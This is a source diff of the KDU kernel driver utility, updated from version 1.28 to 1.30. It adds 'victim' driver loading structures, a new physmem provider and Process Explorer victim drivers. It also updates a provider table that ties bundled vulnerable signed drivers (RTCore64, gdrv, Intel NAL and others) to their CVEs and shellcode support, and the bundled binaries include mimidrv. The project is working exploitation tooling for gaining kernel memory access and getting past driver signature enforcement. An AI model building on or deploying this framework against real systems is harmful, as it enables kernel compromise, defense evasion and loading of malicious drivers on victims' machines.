+typedef struct _VICTIM_DRIVER_INFORMATION {
+ ULONG_PTR LoadedImageBase;
+ ULONG ImageSize;
+} VICTIM_DRIVER_INFORMATION, * PVICTIM_DRIVER_INFORMATION;
+
+typedef struct _VICTIM_LOAD_PARAMETERS {
+ struct _KDU_VICTIM_PROVIDER *Provider;
+} VICTIM_LOAD_PARAMETERS, * PVICTIM_LOAD_PARAMETERS;
+
//
// No optional victim flags specified, this is default value.
//
@@ -51,6 +76,7 @@ typedef struct _KDU_VICTIM_PROVIDER {
LPCWSTR Name; //same as device name
LPCWSTR Desc; //optional
ULONG ResourceId;
+ ULONG VictimId;
ACCESS_MASK DesiredAccess;
union {
ULONG Flags;
@@ -64,12 +90,21 @@ typedef struct _KDU_VICTIM_PROVIDER {
pfnVictimRelease Release;
pfnVictimExecute Execute;
} Callbacks;
+
+ struct {
+ PVOID DispatchSignature;
+ ULONG DispatchSignatureLength;
+ PVOID VictimImage;
+ } Data;
+
} KDU_VICTIM_PROVIDER, * PKDU_VICTIM_PROVIDER;
BOOL VpCreate(
_Inout_ PKDU_VICTIM_PROVIDER Context,
_In_opt_ HINSTANCE ModuleBase,
- _Out_opt_ PHANDLE VictimHandle);
+ _Out_opt_ PHANDLE VictimHandle,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam);
BOOL VpRelease(
_In_ PKDU_VICTIM_PROVIDER Context,
@@ -84,7 +119,10 @@ BOOL VpCreateCallback(
_In_ LPCWSTR Name,
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle);
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID* VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam);
BOOL VpReleaseCallback(
_In_ LPCWSTR Name);
@@ -99,12 +137,31 @@ BOOL VpCreateFromExistingCallback(
_In_ LPCWSTR Name,
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle);
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID* VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam);
VOID VpExecuteFromExistingCallback(
_In_ LPCWSTR Name,
_In_ ACCESS_MASK DesiredAccess,
_Out_ PHANDLE VictimHandle);
+VOID VpExecuteCallbackEx(
+ _In_ LPCWSTR Name,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE VictimHandle);
+
BOOL VpReleaseCallbackStub(
_In_ LPCWSTR Name);
+
+NTSTATUS CALLBACK VpLoadDriverCallback(
+ _In_ PUNICODE_STRING RegistryPath,
+ _In_opt_ PVOID Param);
+
+_Success_(return != FALSE)
+BOOL VpQueryInformation(
+ _In_ PKDU_VICTIM_PROVIDER Context,
+ _In_ VICTIM_INFORMATION VictimInformationClass,
+ _Inout_ PVOID Information,
+ _In_ ULONG InformationLength);
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index 54934e1..d5c2138 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: CONSTS.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Global consts.
*
@@ -20,9 +20,9 @@
#pragma once
#define KDU_VERSION_MAJOR 1
-#define KDU_VERSION_MINOR 2
-#define KDU_VERSION_REVISION 8
-#define KDU_VERSION_BUILD 2212
+#define KDU_VERSION_MINOR 3
+#define KDU_VERSION_REVISION 0
+#define KDU_VERSION_BUILD 2303
#define KDU_MIN_NTBUILDNUMBER 0x1DB1 //Windows 7 SP1
#define KDU_MAX_NTBUILDNUMBER 0xFFFFFFFF //Undefined
@@ -34,7 +34,8 @@
#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
#define PROCEXP152 L"PROCEXP152"
-#define PROCEXP_DESC L"Process Explorer"
+#define PROCEXP1627_DESC L"Process Explorer v16"
+#define PROCEXP1702_DESC L"Process Explorer v17"
#define NTOSKRNL_EXE L"ntoskrnl.exe"
#define CI_DLL L"CI.dll"
@@ -59,11 +60,19 @@
#define SYSTEM_PID_MAGIC 4
-#define PE152_DISPATCH_OFFSET 0x2220 // Valid only for 1.5.2
-#define PE152_DISPATCH_PAGE_OFFSET 0x0220
+#define TEXT_SECTION ".text"
+#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)
#define SHELLCODE_SMALL 0x200
+//
+// Victim providers id table
+//
+#define KDU_VICTIM_PE1627 0
+#define KDU_VICTIM_PE1702 1
+#define KDU_VICTIM_MAX 2
+#define KDU_VICTIM_DEFAULT KDU_VICTIM_PE1702
+
//
// Data id table
//
@@ -76,7 +85,8 @@
//
// Driver id table
//
-#define IDR_PROCEXP 100
+#define IDR_PROCEXP1627 2000
+#define IDR_PROCEXP1702 2001
#define IDR_INTEL_NAL 103
#define IDR_RTCORE64 105
#define IDR_GDRV 106
@@ -107,7 +117,7 @@
#define IDR_ASROCKDRV 131
#define IDR_ALSYSIO64 132
#define IDR_AMD_RYZENMASTER 133
-#define IDR_RESERVED0 134
+#define IDR_PHYSMEM 134
#define IDR_RESERVED1 135
#define IDR_RESERVED2 136
#define IDR_RESERVED3 137
@@ -148,6 +158,9 @@
#define KDU_PROVIDER_ASROCK 28
#define KDU_PROVIDER_ALCPU 29
#define KDU_PROVIDER_AMD_RYZENMASTER 30
+#define KDU_PROVIDER_HR_PHYSMEM 31
+
+#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
//
// KDU provider flags
@@ -200,6 +213,12 @@
//
#define KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE 0x00000080
+//
+// When provider support both virtual/physical memory acccess.
+//
+#define KDUPROV_FLAGS_PREFER_PHYSICAL 0x00000100
+#define KDUPROV_FLAGS_PREFER_VIRTUAL 0x00000200
+
//
// KDU shellcode support flags
//
diff --git a/Source/Shared/kdubase.h b/Source/Shared/kdubase.h
index 71cce52..8dd690b 100644
--- a/Source/Shared/kdubase.h
+++ b/Source/Shared/kdubase.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: KDUBASE.H
*
-* VERSION: 1.27
+* VERSION: 1.30
*
-* DATE: 10 Nov 2022
+* DATE: 20 Mar 2023
*
* Base KDU definitions.
*
@@ -36,6 +36,7 @@ typedef struct _KDU_DB_ENTRY {
ULONG MaxNtBuildNumberSupport;
ULONG ResourceId;
ULONG ProviderId;
+ ULONG VictimId;
KDU_SOURCEBASE DrvSourceBase;
union {
ULONG Flags;
@@ -48,7 +49,9 @@ typedef struct _KDU_DB_ENTRY {
ULONG PML4FromLowStub : 1;
ULONG NoVictim : 1;
ULONG PhysMemoryBruteForce : 1;
- ULONG Reserved : 24;
+ ULONG PreferPhysical : 1;
+ ULONG PreferVirtual : 1;
+ ULONG Reserved : 22;
};
};
ULONG SupportedShellFlags;
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index be3b446..6c4879b 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -210,7 +210,10 @@
+
+
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index 44683d1..fbebd68 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -145,6 +145,15 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
+
+ Resource Files
+
diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin
index 5166395..002c866 100644
Binary files a/Source/Tanikaze/data/KMUEXE.bin and b/Source/Tanikaze/data/KMUEXE.bin differ
diff --git a/Source/Tanikaze/data/KMUSIG.bin b/Source/Tanikaze/data/KMUSIG.bin
index 8e2fb2e..58c4ad0 100644
Binary files a/Source/Tanikaze/data/KMUSIG.bin and b/Source/Tanikaze/data/KMUSIG.bin differ
diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin
index bc5214f..756ba3b 100644
Binary files a/Source/Tanikaze/data/dbutilcat.bin and b/Source/Tanikaze/data/dbutilcat.bin differ
diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin
index e407a9a..f0846c3 100644
Binary files a/Source/Tanikaze/data/dbutilinf.bin and b/Source/Tanikaze/data/dbutilinf.bin differ
diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin
index 18fa28d..ff31eb3 100644
Binary files a/Source/Tanikaze/drv/ALSysIO64.bin and b/Source/Tanikaze/drv/ALSysIO64.bin differ
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index bf09a2f..02647c5 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin
index 795d683..dafac1c 100644
Binary files a/Source/Tanikaze/drv/AsIO3.bin and b/Source/Tanikaze/drv/AsIO3.bin differ
diff --git a/Source/Tanikaze/drv/AsrDrv106.bin b/Source/Tanikaze/drv/AsrDrv106.bin
index 658473a..e558f81 100644
Binary files a/Source/Tanikaze/drv/AsrDrv106.bin and b/Source/Tanikaze/drv/AsrDrv106.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
index 0770209..bca03a4 100644
Binary files a/Source/Tanikaze/drv/DbUtil2_3.bin and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index f35103c..9b91215 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin
index a2344e4..7786566 100644
Binary files a/Source/Tanikaze/drv/DirectIo64_2.bin and b/Source/Tanikaze/drv/DirectIo64_2.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 2babeaa..c549b26 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index f1fa3ed..c771817 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index c827ed3..9a0c0a9 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin
index ae1ec94..d14ccd3 100644
Binary files a/Source/Tanikaze/drv/HW64.bin and b/Source/Tanikaze/drv/HW64.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index f6358a8..995ce14 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index bd797dc..19fd062 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 7c5c57e..51417fa 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/SysDrv3S.bin b/Source/Tanikaze/drv/SysDrv3S.bin
index 4581fa0..d52e402 100644
Binary files a/Source/Tanikaze/drv/SysDrv3S.bin and b/Source/Tanikaze/drv/SysDrv3S.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index 8d76c96..d3bdd63 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/amsdk.bin b/Source/Tanikaze/drv/amsdk.bin
index 03ede7b..a5e00ff 100644
Binary files a/Source/Tanikaze/drv/amsdk.bin and b/Source/Tanikaze/drv/amsdk.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index fae8492..57d230b 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin
index 8bbd46f..0af932f 100644
Binary files a/Source/Tanikaze/drv/dbk64.bin and b/Source/Tanikaze/drv/dbk64.bin differ
diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin
index 29af1ab..d660b74 100644
Binary files a/Source/Tanikaze/drv/dbutildrv2.bin and b/Source/Tanikaze/drv/dbutildrv2.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index 308ab19..9fc6d0f 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index a26d56c..5a99c5a 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
index bf3934e..71019b4 100644
Binary files a/Source/Tanikaze/drv/gmerdrv.bin and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index 599febf..bf3d7c0 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/inpoutx64.bin b/Source/Tanikaze/drv/inpoutx64.bin
index addb0a3..d084655 100644
Binary files a/Source/Tanikaze/drv/inpoutx64.bin and b/Source/Tanikaze/drv/inpoutx64.bin differ
diff --git a/Source/Tanikaze/drv/kprocesshacker.bin b/Source/Tanikaze/drv/kprocesshacker.bin
index 40a33b1..6c06330 100644
Binary files a/Source/Tanikaze/drv/kprocesshacker.bin and b/Source/Tanikaze/drv/kprocesshacker.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index db479db..11ea2da 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/mimidrv.bin b/Source/Tanikaze/drv/mimidrv.bin
index 785cfbe..8c01f58 100644
Binary files a/Source/Tanikaze/drv/mimidrv.bin and b/Source/Tanikaze/drv/mimidrv.bin differ
diff --git a/Source/Tanikaze/drv/physmem.bin b/Source/Tanikaze/drv/physmem.bin
new file mode 100644
index 0000000..11736db
Binary files /dev/null and b/Source/Tanikaze/drv/physmem.bin differ
diff --git a/Source/Tanikaze/drv/procexp.bin b/Source/Tanikaze/drv/procexp1627.bin
similarity index 99%
rename from Source/Tanikaze/drv/procexp.bin
rename to Source/Tanikaze/drv/procexp1627.bin
index db55e27..e0bb1f2 100644
Binary files a/Source/Tanikaze/drv/procexp.bin and b/Source/Tanikaze/drv/procexp1627.bin differ
diff --git a/Source/Tanikaze/drv/procexp1702.bin b/Source/Tanikaze/drv/procexp1702.bin
new file mode 100644
index 0000000..ff9c69e
Binary files /dev/null and b/Source/Tanikaze/drv/procexp1702.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index a8369a8..abc1b5d 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index b5326d0..5722353 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -2,7 +2,6 @@
// Microsoft Visual C++ generated include file.
// Used by resource.rc
//
-#define IDR_PROCEXP 100
#define IDR_INTEL_NAL 103
#define IDR_RTCORE64 105
#define IDR_GDRV 106
@@ -33,19 +32,22 @@
#define IDR_ASROCKDRV 131
#define IDR_ALSYSIO64 132
#define IDR_AMD_RYZENMASTER 133
+#define IDR_PHYSMEM 134
#define IDR_DATA_DBUTILCAT 1000
#define IDR_DATA_DBUTILINF 1001
#define IDR_DATA_KMUEXE 1002
#define IDR_DATA_KMUSIG 1003
#define IDR_DATA_ASUSCERTSERVICE 1004
+#define IDR_PROCEXP1627 2000
+#define IDR_PROCEXP1702 2001
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 134
+#define _APS_NEXT_RESOURCE_VALUE 140
#define _APS_NEXT_COMMAND_VALUE 40001
-#define _APS_NEXT_CONTROL_VALUE 1001
+#define _APS_NEXT_CONTROL_VALUE 1007
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index 1ec58d6..3c8ba8a 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -52,7 +52,7 @@ END
IDR_INTEL_NAL RCDATA "drv\\iQVM64.bin"
-IDR_PROCEXP RCDATA "drv\\procexp.bin"
+IDR_PROCEXP1627 RCDATA "drv\\procexp1627.bin"
IDR_RTCORE64 RCDATA "drv\\RTCore64.bin"
@@ -122,6 +122,10 @@ IDR_ALSYSIO64 RCDATA "drv\\ALSysIO64.bin"
IDR_AMD_RYZENMASTER RCDATA "drv\\AMDRyzenMasterDriver.bin"
+IDR_PHYSMEM RCDATA "drv\\physmem.bin"
+
+IDR_PROCEXP1702 RCDATA "drv\\procexp1702.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -129,8 +133,8 @@ IDR_AMD_RYZENMASTER RCDATA "drv\\AMDRyzenMasterDriver.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,1,2212
- PRODUCTVERSION 1,1,1,2212
+ FILEVERSION 1,1,2,2303
+ PRODUCTVERSION 1,1,2,2303
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -147,12 +151,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.1.1.2212"
+ VALUE "FileVersion", "1.1.2.2303"
VALUE "InternalName", "Tanikaze.dll"
- VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project"
+ VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.1.2212"
+ VALUE "ProductVersion", "1.1.2.2303"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Tanikaze/tanikaze.h b/Source/Tanikaze/tanikaze.h
index 7f5f9fc..4286444 100644
--- a/Source/Tanikaze/tanikaze.h
+++ b/Source/Tanikaze/tanikaze.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: CONSTS.H
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 02 Dec 2022
+* DATE: 20 Mar 2023
*
* Tanikaze helper dll (part of KDU project).
*
@@ -30,8 +30,9 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_INTEL_NAL,
KDU_PROVIDER_INTEL_NAL,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
- KDUPROV_FLAGS_NONE,
+ KDUPROV_FLAGS_PREFER_PHYSICAL,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2015-2291",
(LPWSTR)L"NalDrv",
@@ -44,6 +45,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_RTCORE64,
KDU_PROVIDER_UNWINDER_RTCORE,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NONE,
KDUPROV_SC_ALL_DEFAULT,
@@ -58,13 +60,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_GDRV,
KDU_PROVIDER_GIGABYTE_GDRV,
+ KDU_VICTIM_DEFAULT,
SourceBaseMapMem,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2018-19320",
(LPWSTR)L"Gdrv",
(LPWSTR)L"GIO",
- (LPWSTR)L"Giga-Byte Technology",
+ (LPWSTR)L"Giga-Byte Technology"
},
{
@@ -72,13 +75,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ATSZIO64,
KDU_PROVIDER_ASUSTEK_ATSZIO,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASUSTeK WinFlash",
(LPWSTR)L"ATSZIO",
(LPWSTR)L"ATSZIO",
- (LPWSTR)L"ASUSTeK Computer Inc.",
+ (LPWSTR)L"ASUSTeK Computer Inc."
},
{
@@ -86,13 +90,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_MSIO64,
KDU_PROVIDER_PATRIOT_MSIO64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2019-18845",
(LPWSTR)L"MsIo64",
(LPWSTR)L"MsIo",
- (LPWSTR)L"MICSYS Technology Co., Ltd.",
+ (LPWSTR)L"MICSYS Technology Co., Ltd."
},
{
@@ -100,13 +105,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_GLCKIO2,
KDU_PROVIDER_GLCKIO2,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASRock Polychrome RGB, multiple CVE ids",
(LPWSTR)L"GLCKIo2",
(LPWSTR)L"GLCKIo2",
- (LPWSTR)L"ASUSTeK Computer Inc.",
+ (LPWSTR)L"ASUSTeK Computer Inc."
},
{
@@ -114,13 +120,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ENEIO64,
KDU_PROVIDER_ENEIO64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"G.SKILL Trident Z Lighting Control",
(LPWSTR)L"EneIo64",
(LPWSTR)L"EneIo",
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -128,13 +135,14 @@ KDU_DB_ENTRY gProvEntry[] = {
NT_WIN10_REDSTONE3,
IDR_WINRING0,
KDU_PROVIDER_WINRING0,
+ KDU_VICTIM_PE1627,
SourceBaseWinRing0,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"EVGA Precision X1",
(LPWSTR)L"WinRing0x64",
(LPWSTR)L"WinRing0_1_2_0",
- (LPWSTR)L"EVGA",
+ (LPWSTR)L"EVGA"
},
{
@@ -142,13 +150,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ENETECHIO64,
KDU_PROVIDER_ENETECHIO64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Thermaltake TOUGHRAM Software",
(LPWSTR)L"EneTechIo64",
(LPWSTR)L"EneTechIo",
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -156,13 +165,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_PHYMEMX64,
KDU_PROVIDER_PHYMEM64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Huawei MateBook Manager",
(LPWSTR)L"phymemx64",
(LPWSTR)L"PhyMem",
- (LPWSTR)L"Huawei Technologies Co.,Ltd.",
+ (LPWSTR)L"Huawei Technologies Co.,Ltd."
},
{
@@ -170,13 +180,14 @@ KDU_DB_ENTRY gProvEntry[] = {
NT_WIN10_REDSTONE3,
IDR_RTKIO64,
KDU_PROVIDER_RTKIO64,
+ KDU_VICTIM_DEFAULT,
SourceBasePhyMem,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Realtek Dash Client Utility",
(LPWSTR)L"rtkio64",
(LPWSTR)L"rtkio",
- (LPWSTR)L"Realtek Semiconductor Corp.",
+ (LPWSTR)L"Realtek Semiconductor Corp."
},
{
@@ -184,13 +195,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ENETECHIO64B,
KDU_PROVIDER_ENETECHIO64B,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"MSI Dragon Center",
(LPWSTR)L"EneTechIo64",
(LPWSTR)L"EneTechIo",
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -198,13 +210,14 @@ KDU_DB_ENTRY gProvEntry[] = {
NT_WIN10_REDSTONE3,
IDR_LHA,
KDU_PROVIDER_LHA,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2019-8372",
(LPWSTR)L"lha",
(LPWSTR)L"{E8F2FF20-6AF7-4914-9398-CE2132FE170F}",
- (LPWSTR)L"LG Electronics Inc.",
+ (LPWSTR)L"LG Electronics Inc."
},
{
@@ -212,13 +225,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ASUSIO2,
KDU_PROVIDER_ASUSIO2,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASUS GPU Tweak",
(LPWSTR)L"AsIO2",
(LPWSTR)L"Asusgio2",
- (LPWSTR)L"ASUSTeK Computer Inc.",
+ (LPWSTR)L"ASUSTeK Computer Inc."
},
{
@@ -226,13 +240,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_DIRECTIO64,
KDU_PROVIDER_DIRECTIO64,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"PassMark DirectIO",
(LPWSTR)L"DirectIo64",
(LPWSTR)L"DIRECTIO64",
- (LPWSTR)L"PassMark Software Pty Ltd",
+ (LPWSTR)L"PassMark Software Pty Ltd"
},
{
@@ -240,13 +255,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_GMERDRV,
KDU_PROVIDER_GMER,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NO_FORCED_SD,
KDUPROV_SC_ALL_DEFAULT,
